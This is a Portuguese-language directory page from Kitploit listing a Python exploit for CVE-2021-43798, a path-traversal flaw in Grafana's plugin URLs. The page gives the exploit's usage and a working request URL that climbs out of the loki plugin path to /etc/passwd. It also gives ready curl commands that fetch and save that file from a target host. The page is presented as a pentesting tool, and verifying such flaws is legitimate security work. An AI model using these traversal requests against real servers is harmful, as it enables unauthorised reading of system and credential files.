Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-43798 — Exploit em Python para CVE-2021-43798, uma vulnerabilidade de path traversal no Grafana que permite leitura arbitrária de arquivos via traversal de diretório em URLs de plugins. | Kitploit
Ferramentas/GitHubGitHub/g01d3nw01f/cve-2021-43798
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubg01d3nw01f/cve-2021-43798

CVE-2021-43798

Exploit em Python para CVE-2021-43798, uma vulnerabilidade de path traversal no Grafana que permite leitura arbitrária de arquivos via traversal de diretório em URLs de plugins.

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

uso: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: erro: os seguintes argumentos são obrigatórios: -H/--host

exemplo: python3 grafana-exploit.py --host <target_host>

se a leitura de arquivo arbitrário for bem-sucedida mostra a URL da requisição e o comando curl

[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
 
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"

então se você quiser baixar o arquivo, execute como acima

curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
Baixar ferramenta